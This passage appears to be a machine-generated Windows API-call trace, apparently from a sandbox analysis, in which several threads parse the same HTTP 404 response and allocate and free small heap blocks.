RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0345.738] GetProcessHeap () returned 0x690000 [0345.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0345.738] GetProcessHeap () returned 0x690000 [0345.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 662 os_tid = 0x19e0 [0345.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.901] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0345.901] GetProcessHeap () returned 0x690000 [0345.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0345.901] GetProcessHeap () returned 0x690000 [0345.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0345.901] GetProcessHeap () returned 0x690000 [0345.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 663 os_tid = 0x19e8 [0346.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.090] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0346.090] GetProcessHeap () returned 0x690000 [0346.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0346.091] GetProcessHeap () returned 0x690000 [0346.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0346.091] GetProcessHeap () returned 0x690000 [0346.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 664 os_tid = 0x19ec [0346.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.278] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0346.278] GetProcessHeap () returned 0x690000 [0346.278] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0346.278] GetProcessHeap () returned 0x690000 [0346.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0346.279] GetProcessHeap () returned 0x690000 [0346.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 665 os_tid = 0x19f0 [0346.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.492] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0346.492] GetProcessHeap () returned 0x690000 [0346.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0346.492] GetProcessHeap () returned 0x690000 [0346.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0346.492] GetProcessHeap () returned 0x690000 [0346.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 666 os_tid = 0x19f4